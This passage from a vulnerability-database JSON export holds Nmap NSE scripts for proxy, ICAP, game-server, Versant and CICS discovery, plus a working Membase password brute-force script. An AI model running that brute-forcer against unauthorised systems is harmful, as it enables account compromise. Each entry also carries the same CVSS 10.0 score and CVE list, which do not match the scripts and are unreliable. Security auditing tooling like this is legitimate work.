(responsebody)\n return responsebody:match \"<title>(.-)</title>\"\nend\n\n--- Attempts to extract the X-Forwarded-For header\n-- from an HTTP response body in case of TRACE requests.\n--@param responsebody Response's body.\nlocal function extract_xfwd (responsebody)\n return responsebody:match \"X-Forwarded-For: [^\\r\\n]*\"\nend\n\n--- Check for differences in response headers, status code\n-- and html title between responses.\n--@param responses Responses to compare.\n--@param method Used HTTP method.\nlocal compare_responses = function(responses, method)\n local response, key\n local results = {}\n local result = {}\n local titles = {}\n local interesting_headers = {\n 'server',\n 'via',\n 'x-via',\n 'x-forwarded-for',\n 'content-type',\n 'content-length',\n 'last-modified',\n 'location',\n }\n\n -- Check page title\n for key,response in pairs(responses) do\n titles[key] = extract_title(response.body)\n end\n if titles[1] ~= titles[2] or\n titles[1] ~= titles[3] then\n\n table.insert(results, 'HTML title')\n for key,response in pairs(responses) do\n table.insert(result, \"Hop #\" .. key .. \": \" .. titles[key])\n end\n table.insert(results, result)\n end\n\n -- Check status code\n if responses[1].status == 502 or\n responses[1].status == 483 or\n responses[1].status ~= responses[2].status or\n responses[1].status ~= responses[3].status then\n\n result = {}\n table.insert(results, 'Status Code')\n for key,response in pairs(responses) do\n table.insert(result, \"Hop #\" .. key .. \": \" .. tostring(response.status))\n end\n table.insert(results, result)\n end\n\n -- Check headers\n for _,header in pairs(interesting_headers) do\n -- Compare header of different responses\n if responses[1].header[header] ~= responses[2].header[header] or\n responses[1].header[header] ~= responses[3].header[header] then\n\n result = {}\n table.insert(results, header)\n for key,response in pairs(responses) do\n if response.header[header] ~= nil then\n table.insert(result, \"Hop #\" .. key .. \": \" .. tostring(response.header[header]))\n else\n table.insert(result, \"Hop #\" .. key)\n end\n end\n table.insert(results, result)\n end\n end\n\n -- Check for X-Forwarded-For in the response body\n -- when using TRACE method\n if method == \"TRACE\" then\n local xfwd = extract_xfwd(responses[1].body)\n if xfwd ~= nil then\n table.insert(results, xfwd)\n end\n end\n\n return results\nend\n\naction = function(host, port)\n local path = stdnse.get_script_args(SCRIPT_NAME .. '.path') or \"/\"\n local method = stdnse.get_script_args(SCRIPT_NAME .. '.method') or \"GET\"\n local responses = {}\n local detected = \"Possible reverse proxy detected.\"\n\n for i = 0,2 do\n local response = http.generic_request(host, port, method, path, { ['header'] = { ['Max-Forwards'] = i }, ['no_cache'] = true})\n table.insert(responses, response)\n end\n\n -- Check results\n local results = compare_responses(responses, method)\n if results ~= nil and nmap.verbosity() == 1 then\n return stdnse.format_output(true,detected)\n else\n return stdnse.format_output(true,results)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:40:57", "description": "Performs brute force password auditing against Couchbase Membase servers.\n\n## Script Arguments \n\n#### membase-brute.bucketname \n\nif specified, password guessing is performed only against this bucket.\n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### membase.authmech \n\nSee the documentation for the [membase](<../lib/membase.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 11211 --script membase-brute\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 11211/tcp open unknown\n | membase-brute:\n | Accounts\n | buckettest:toledo - Valid credentials\n | Statistics\n |_ Performed 5000 guesses in 2 seconds, average tps: 2500\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [membase](<../lib/membase.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-10T18:19:21", "type": "nmap", "title": "membase-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-03-10T03:09:39", "id": "NMAP:MEMBASE-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/membase-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal membase = require \"membase\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nPerforms brute force password auditing against Couchbase Membase servers.\n]]\n\n---\n-- @usage\n-- nmap -p 11211 --script membase-brute\n--\n-- @output\n-- PORT STATE SERVICE\n-- 11211/tcp open unknown\n-- | membase-brute:\n-- | Accounts\n-- | buckettest:toledo - Valid credentials\n-- | Statistics\n-- |_ Performed 5000 guesses in 2 seconds, average tps: 2500\n--\n-- @args membase-brute.bucketname if specified, password guessing is performed\n-- only against this bucket.\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\n\nportrule = shortport.port_or_service({11210,11211}, \"couchbase-tap\", \"tcp\")\n\nlocal arg_bucketname = stdnse.get_script_args(SCRIPT_NAME..\".bucketname\")\n\n\nDriver = {\n\n new = function(self, host, port, options)\n local o = { host = host, port = port, options = options }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n connect = function(self)\n self.helper = membase.Helper:new(self.host, self.port)\n return self.helper:connect(brute.new_socket())\n end,\n\n login = function(self, username, password)\n local status, response = self.helper:login(arg_bucketname or username, password)\n if ( not(status) and \"Auth failure\" == response ) then\n return false, brute.Error:new( \"Incorrect password\" )\n elseif ( not(status) ) then\n local err = brute.Error:new( response )\n err:setRetry( true )\n return false, err\n end\n return true, creds.Account:new( arg_bucketname or username, password, creds.State.VALID)\n end,\n\n disconnect = function(self)\n return self.helper:close()\n end\n\n}\n\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\nlocal function getMechs(host, port)\n local helper = membase.Helper:new(host, port)\n local status, err = helper:connect()\n if ( not(status) ) then\n return false, \"Failed to connect to server\"\n end\n\n local status, response = helper:getSASLMechList()\n if ( not(status) ) then\n stdnse.debug2(\"Received unexpected response: %s\", response)\n return false, \"Received unexpected response\"\n end\n\n helper:close()\n return true, response.mechs\nend\n\naction = function(host, port)\n\n local status, mechs = getMechs(host, port)\n\n if ( not(status) ) then\n return fail(mechs)\n end\n if ( not(mechs:match(\"PLAIN\") ) ) then\n return fail(\"Unsupported SASL mechanism\")\n end\n\n local result\n local engine = brute.Engine:new(Driver, host, port )\n\n engine.options.script_name = SCRIPT_NAME\n engine.options.firstonly = true\n\n if ( arg_bucketname ) then\n engine.options:setOption( \"passonly\", true )\n end\n\n status, result = engine:start()\n return result\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:54", "description": "Tests a list of known ICAP service names and prints information about any it detects. The Internet Content Adaptation Protocol (ICAP) is used to extend transparent proxy servers and is generally used for content filtering and antivirus scanning.\n\n## Example Usage \n \n \n nmap -p 1344 <ip> --script icap-info\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 1344/tcp open unknown\n | icap-info:\n | /avscan\n | Service: C-ICAP/0.1.6 server - Clamav/Antivirus service\n | ISTag: CI0001-000-0973-6314940\n | /echo\n | Service: C-ICAP/0.1.6 server - Echo demo service\n | ISTag: CI0001-XXXXXXXXX\n | /srv_clamav\n | Service: C-ICAP/0.1.6 server - Clamav/Antivirus service\n | ISTag: CI0001-000-0973-6314940\n | /url_check\n | Service: C-ICAP/0.1.6 server - Url_Check demo service\n |_ ISTag: CI0001-XXXXXXXXX\n \n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [match](<../lib/match.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-05-22T18:34:25", "type": "nmap", "title": "icap-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:ICAP-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/icap-info.html", "sourceData": "local nmap = require \"nmap\"\nlocal match = require \"match\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\n\ndescription = [[\nTests a list of known ICAP service names and prints information about\nany it detects. The Internet Content Adaptation Protocol (ICAP) is\nused to extend transparent proxy servers and is generally used for\ncontent filtering and antivirus scanning.\n]]\n\n---\n-- @usage\n-- nmap -p 1344 <ip> --script icap-info\n--\n-- @output\n-- PORT STATE SERVICE\n-- 1344/tcp open unknown\n-- | icap-info:\n-- | /avscan\n-- | Service: C-ICAP/0.1.6 server - Clamav/Antivirus service\n-- | ISTag: CI0001-000-0973-6314940\n-- | /echo\n-- | Service: C-ICAP/0.1.6 server - Echo demo service\n-- | ISTag: CI0001-XXXXXXXXX\n-- | /srv_clamav\n-- | Service: C-ICAP/0.1.6 server - Clamav/Antivirus service\n-- | ISTag: CI0001-000-0973-6314940\n-- | /url_check\n-- | Service: C-ICAP/0.1.6 server - Url_Check demo service\n-- |_ ISTag: CI0001-XXXXXXXXX\n--\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"discovery\"}\n\n\nportrule = shortport.port_or_service(1344, \"icap\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\nlocal function parseResponse(resp)\n if ( not(resp) ) then\n return\n end\n\n local resp_p = { header = {}, rawheader = {} }\n local resp_tbl = stringaux.strsplit(\"\\r?\\n\", resp)\n\n if ( not(resp_tbl) or #resp_tbl == 0 ) then\n stdnse.debug2(\"Received an invalid response from server\")\n return\n end\n\n resp_p.status = tonumber(resp_tbl[1]:match(\"^ICAP/1%.0 (%d*) .*$\"))\n resp_p['status-line'] = resp_tbl[1]\n\n for i=2, #resp_tbl do\n local key, val = resp_tbl[i]:match(\"^([^:]*):%s*(.*)$\")\n if ( not(key) or not(val) ) then\n stdnse.debug2(\"Failed to parse header: %s\", resp_tbl[i])\n else\n resp_p.header[key:lower()] = val\n end\n table.insert(resp_p.rawheader, resp_tbl[i])\n end\n return resp_p\nend\n\naction = function(host, port)\n\n local services = {\"/avscan\", \"/echo\", \"/srv_clamav\", \"/url_check\", \"/nmap\" }\n local headers = {\"Service\", \"ISTag\"}\n local probe = {\n \"OPTIONS icap://%s%s ICAP/1.0\",\n \"Host: %s\",\n \"User-Agent: nmap icap-client/0.01\",\n \"Encapsulated: null-body=0\"\n }\n local hostname = stdnse.get_hostname(host)\n local result = {}\n\n for _, service in ipairs(services) do\n local socket = nmap.new_socket()\n socket:set_timeout(5000)\n if ( not(socket:connect(host, port)) ) then\n return fail(\"Failed to connect to server\")\n end\n\n local request = (table.concat(probe, \"\\r\\n\") .. \"\\r\\n\\r\\n\"):format(hostname, service, hostname)\n\n if ( not(socket:send(request)) ) then\n socket:close()\n return fail(\"Failed to send request to server\")\n end\n\n local status, resp = socket:receive_buf(match.pattern_limit(\"\\r\\n\\r\\n\", 2048), false)\n if ( not(status) ) then\n return fail(\"Failed to receive response from server\")\n end\n\n local resp_p = parseResponse(resp)\n if ( resp_p and resp_p.status == 200 ) then\n local result_part = { name = service }\n for _, h in ipairs(headers) do\n if ( resp_p.header[h:lower()] ) then\n table.insert(result_part, (\"%s: %s\"):format(h, resp_p.header[h:lower()]))\n end\n end\n table.insert(result, result_part)\n end\n end\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:20", "description": "Detects the Freelancer game server (FLServer.exe) service by sending a status query UDP probe. \n\nWhen run as a version detection script (`-sV`), the script will report on the server name, current number of players, maximum number of players, and whether it has a password set. When run explicitly (`--script freelancer-info`), the script will additionally report on the server description, whether players can harm other players, and whether new players are allowed. \n\nSee <http://sourceforge.net/projects/gameq/> (relevant files: games.ini, packets.ini, freelancer.php)\n\n## Example Usage \n \n \n nmap -sU -sV -p 2302 <target>\n nmap -sU -p 2302 --script=freelancer-info <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON VERSION\n 2302/udp open freelancer udp-response Freelancer (name: Discovery Freelancer RP 24/7; players: 152/225; password: no)\n | freelancer-info:\n | server name: Discovery Freelancer RP 24/7\n | server description: This is the official discovery freelancer RP server. To know more about the server, please visit www.discoverygc.com\n | players: 152\n | max. players: 225\n | password: no\n | allow players to harm other players: yes\n |_ allow new players: yes\n \n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2013-11-20T04:31:31", "type": "nmap", "title": "freelancer-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-13T14:58:56", "id": "NMAP:FREELANCER-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/freelancer-info.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nDetects the Freelancer game server (FLServer.exe) service by sending a\nstatus query UDP probe.\n\nWhen run as a version detection script (<code>-sV</code>), the script\nwill report on the server name, current number of players, maximum\nnumber of players, and whether it has a password set. When run\nexplicitly (<code>--script freelancer-info</code>), the script will\nadditionally report on the server description, whether players can harm\nother players, and whether new players are allowed.\n\nSee http://sourceforge.net/projects/gameq/\n(relevant files: games.ini, packets.ini, freelancer.php)\n]]\n\n---\n-- @usage\n-- nmap -sU -sV -p 2302 <target>\n-- nmap -sU -p 2302 --script=freelancer-info <target>\n-- @output\n-- PORT STATE SERVICE REASON VERSION\n-- 2302/udp open freelancer udp-response Freelancer (name: Discovery Freelancer RP 24/7; players: 152/225; password: no)\n-- | freelancer-info:\n-- | server name: Discovery Freelancer RP 24/7\n-- | server description: This is the official discovery freelancer RP server. To know more about the server, please visit www.discoverygc.com\n-- | players: 152\n-- | max. players: 225\n-- | password: no\n-- | allow players to harm other players: yes\n-- |_ allow new players: yes\n--\n-- @xmloutput\n-- <elem key=\"server name\">Discovery Freelancer RP 24/7</elem>\n-- <elem key=\"server description\">This is the official discovery freelancer RP server. To know more about the server, please visit www.discoverygc.com</elem>\n-- <elem key=\"players\">152</elem>\n-- <elem key=\"max. players\">225</elem>\n-- <elem key=\"password\">no</elem>\n-- <elem key=\"allow players to harm other players\">yes</elem>\n-- <elem key=\"allow new players\">yes</elem>\n\nauthor = \"Marin Mar\u017ei\u0107\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"default\", \"discovery\", \"safe\", \"version\" }\n\nportrule = shortport.version_port_or_service({2302}, \"freelancer\", \"udp\")\n\naction = function(host, port)\n local status, data = comm.exchange(host, port,\n \"\\x00\\x02\\xf1\\x26\\x01\\x26\\xf0\\x90\\xa6\\xf0\\x26\\x57\\x4e\\xac\\xa0\\xec\\xf8\\x68\\xe4\\x8d\\x21\",\n { timeout = 3000 })\n if not status then\n return\n end\n\n -- port is open\n nmap.set_port_state(host, port, \"open\")\n\n local passwordbyte, maxplayers, numplayers, name, pvpallow, newplayersallow, description =\n string.match(data, \"^\\x00\\x03\\xf1\\x26............(.)...(.)...(.)...................................................................(.*)\\0\\0(.):(.):.*:.*:.*:(.*)\\0\\0$\")\n if not passwordbyte then\n return\n end\n\n local o = stdnse.output_table()\n\n o[\"server name\"] = string.gsub(name, \"[^%g%s]\", \"\")\n o[\"server description\"] = string.gsub(description, \"[^%g%s]\", \"\")\n o[\"players\"] = numplayers:byte(1) - 1\n o[\"max. players\"] = maxplayers:byte(1) - 1\n\n passwordbyte = passwordbyte:byte(1)\n if passwordbyte & 128 ~= 0 then\n o[\"password\"] = \"yes\"\n else\n o[\"password\"] = \"no\"\n end\n\n o[\"allow players to harm other players\"] = \"n/a\"\n if pvpallow == \"1\" then\n o[\"allow players to harm other players\"] = \"yes\"\n elseif pvpallow == \"0\" then\n o[\"allow players to harm other players\"] = \"no\"\n end\n\n o[\"allow new players\"] = \"n/a\"\n if newplayersallow == \"1\" then\n o[\"allow new players\"] = \"yes\"\n elseif newplayersallow == \"0\" then\n o[\"allow new players\"] = \"no\"\n end\n\n port.version.name = \"freelancer\"\n port.version.name_confidence = 10\n port.version.product = \"Freelancer\"\n port.version.extrainfo = \"name: \" .. o[\"server name\"] .. \"; players: \" ..\n o[\"players\"] .. \"/\" .. o[\"max. players\"] .. \"; password: \" .. o[\"password\"]\n\n nmap.set_port_version(host, port, \"hardmatched\")\n\n return o\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:41", "description": "Discovers Versant object databases using the broadcast srvloc protocol.\n\n## Example Usage \n \n \n nmap --script broadcast-versant-locate\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-versant-locate:\n |_ vod://192.168.200.222:5019\n \n\n## Requires \n\n * [srvloc](<../lib/srvloc.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-03-08T17:51:48", "type": "nmap", "title": "broadcast-versant-locate NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:BROADCAST-VERSANT-LOCATE.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-versant-locate.html", "sourceData": "local srvloc = require \"srvloc\"\nlocal table = require \"table\"\n\ndescription = [[\nDiscovers Versant object databases using the broadcast srvloc protocol.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-versant-locate\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-versant-locate:\n-- |_ vod://192.168.200.222:5019\n--\n-- @xmloutput\n-- <table>\n-- <elem>vod://192.168.200.222:5019</elem>\n-- </table>\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nprerule = function() return true end\n\naction = function()\n local helper = srvloc.Helper:new()\n local status, result = helper:ServiceRequest(\"service:odbms.versant:vod\", \"default\")\n helper:close()\n\n if ( not(status) ) then return end\n local output = {}\n for _, v in ipairs(result) do\n table.insert(output, v:match(\"^service:odbms.versant:vod://(.*)$\"))\n end\n return output\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:32", "description": "Using the CICS transaction CEMT, this script attempts to gather information about the current CICS transaction server region. It gathers OS information, Datasets (files), transactions and user ids. Based on CICSpwn script by Ayoub ELAASSAL.\n\n## Script Arguments \n\n#### cics-info.trans \n\nInstead of gathering all transaction IDs supplying a name here will make the script only look up one transaction ID\n\n#### cics-info.pass \n\nPassword to use if access to CEMT requires authentication\n\n#### cics-info.cemt \n\nCICS Transaction ID to be used. Default is `CEMT`\n\n#### cics-info.user \n\nUsername to use if access to CEMT requires authentication\n\n#### cics-info.commands \n\nCommand used to access cics. Default is `cics`\n\n## Example Usage \n \n \n nmap --script=cics-info -p 23 <targets>\n \n nmap --script=cics-info --script-args cics-info.commands='logon applid(coolcics)',\n cics-info.user=test,cics-info.pass=test,cics-info.cemt='ZEMT',\n cics-info.trans=CICA -p 23 <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE VERSION\n 23/tcp open tn3270 IBM Telnet TN3270 (TN3270E)\n | cics-info:\n | Security: Disabled\n | System:\n | z/OS Version: 02.01.00\n | CICS Version: 05.02.00\n | System ID: CICS\n | Application ID: CICSFAKE\n | Default User: USERCICS\n | Datasets:\n | CICS.FILEA\n | HLQ123.CICS.DFHCSD\n | HLQ123.CICS.DFHLRQ\n | Libraries:\n | HLQ123.CICS.SDFHLOAD\n | Users:\n | USERCICS\n | Transaction / Program:\n | AADD / DFH$AALL\n | ABRW / DFH$ABRW\n | AINQ / DFH$AALL\n | AMNU / DFH$AMNU\n | AORD / DFH$AREN\n | AORQ / DFH$ACOM\n | AREP / DFH$AREP\n | AUPD / DFH$AALL\n | CADP / DFHDPLU\n ...\n | CEDX / DFHEDFP\n | CEGN / DFHCEGN\n | CEHP / DFHCHS\n | CEHS / DFHCHS\n | CEJR / DFHEJITL\n | CEMN / DFHCEMNA\n | CEMT / DFHEMTP\n | CEOT / DFHEOTP\n | CXRT / DFHCRT\n | DSNC / DFHD2CM1\n\n## Requires \n\n * [stdnse](<../lib/stdnse.html>)\n * [shortport](<../lib/shortport.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [tn3270](<../lib/tn3270.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-01T20:41:18", "type": "nmap", "title": "cics-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-06-27T19:13:41", "id": "NMAP:CICS-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/cics-info.html", "sourceData": "local stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal stringaux = require \"stringaux\"\nlocal tn3270 = require \"tn3270\"\nlocal table = require \"table\"\n\n\ndescription = [[\nUsing the CICS transaction CEMT, this script attempts to gather information\nabout the current CICS transaction server region. It gathers OS information,\nDatasets (files), transactions and user ids. Based on CICSpwn script by\nAyoub ELAASSAL.\n]]\n\n---\n-- @args cics-info.commands Command used to access cics. Default is <code>cics</code>\n-- @args cics-info.cemt CICS Transaction ID to be used. Default is <code>CEMT</code>\n-- @args cics-info.trans Instead of gathering all transaction IDs supplying a name here\n-- will make the script only look up one transaction ID\n-- @args cics-info.user Username to use if access to CEMT requires authentication\n-- @args cics-info.pass Password to use if access to CEMT requires authentication\n--\n-- @usage\n-- nmap --script=cics-info -p 23 <targets>\n--\n-- nmap --script=cics-info --script-args cics-info.commands='logon applid(coolcics)',\n-- cics-info.user=test,cics-info.pass=test,cics-info.cemt='ZEMT',\n-- cics-info.trans=CICA -p 23 <targets>\n--\n-- @output\n-- PORT STATE SERVICE VERSION\n-- 23/tcp open tn3270 IBM Telnet TN3270 (TN3270E)\n-- | cics-info:\n-- | Security: Disabled\n-- | System:\n-- | z/OS Version: 02.01.00\n-- | CICS Version: 05.02.00\n-- | System ID: CICS\n-- | Application ID: CICSFAKE\n-- | Default User: USERCICS\n-- | Datasets:\n-- | CICS.FILEA\n-- | HLQ123.CICS.DFHCSD\n-- | HLQ123.CICS.DFHLRQ\n-- | Libraries:\n-- | HLQ123.CICS.SDFHLOAD\n-- | Users:\n-- | USERCICS\n-- | Transaction / Program:\n-- | AADD / DFH$AALL\n-- | ABRW / DFH$ABRW\n-- | AINQ / DFH$AALL\n-- | AMNU / DFH$AMNU\n-- | AORD / DFH$AREN\n-- | AORQ / DFH$ACOM\n-- | AREP / DFH$AREP\n-- | AUPD / DFH$AALL\n-- | CADP / DFHDPLU\n-- ...\n-- | CEDX / DFHEDFP\n-- | CEGN / DFHCEGN\n-- | CEHP / DFHCHS\n-- | CEHS / DFHCHS\n-- | CEJR / DFHEJITL\n-- | CEMN / DFHCEMNA\n-- | CEMT / DFHEMTP\n-- | CEOT / DFHEOTP\n-- | CXRT / DFHCRT\n-- | DSNC / DFHD2CM1\n\n-- @changelog\n-- 2017-01-30 - v0.1 - created by Soldier of Fortran\n\nauthor = \"Philip Young aka Soldier of Fortran\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\nportrule = shortport.port_or_service({23,992}, \"tn3270\")\n\n\n\n--- Gathers CICS transaction server information\n--\n-- @param host host NSE object\n-- @param port port NSE object\n-- @param user CICS userID\n-- @param pass CICS userID password\n-- @param commands optional script-args of commands to use to get to CICS\n-- @param cemt transaction ID to use instead of CEMT\n-- @param trans transaction ID to check instead of gathering all\n-- @return Status boolean true if CICS was detected.\n-- @return Table of information or error message\n\nlocal function cics_info( host, port, commands, user, pass, cemt, trans )\n stdnse.debug(\"Checking for CICS\")\n local tn = tn3270.Telnet:new()\n local status, err = tn:initiate(host,port)\n local msg = 'Unable to get to CICS'\n local more = true\n local count = 1\n local results = stdnse.output_table()\n if not status then\n stdnse.debug(\"Could not initiate TN3270: %s\", err )\n return false, msg\n end\n tn:get_screen_debug(2) -- prints TN3270 screen to debug\n stdnse.debug(\"Getting to CICS\")\n local run = 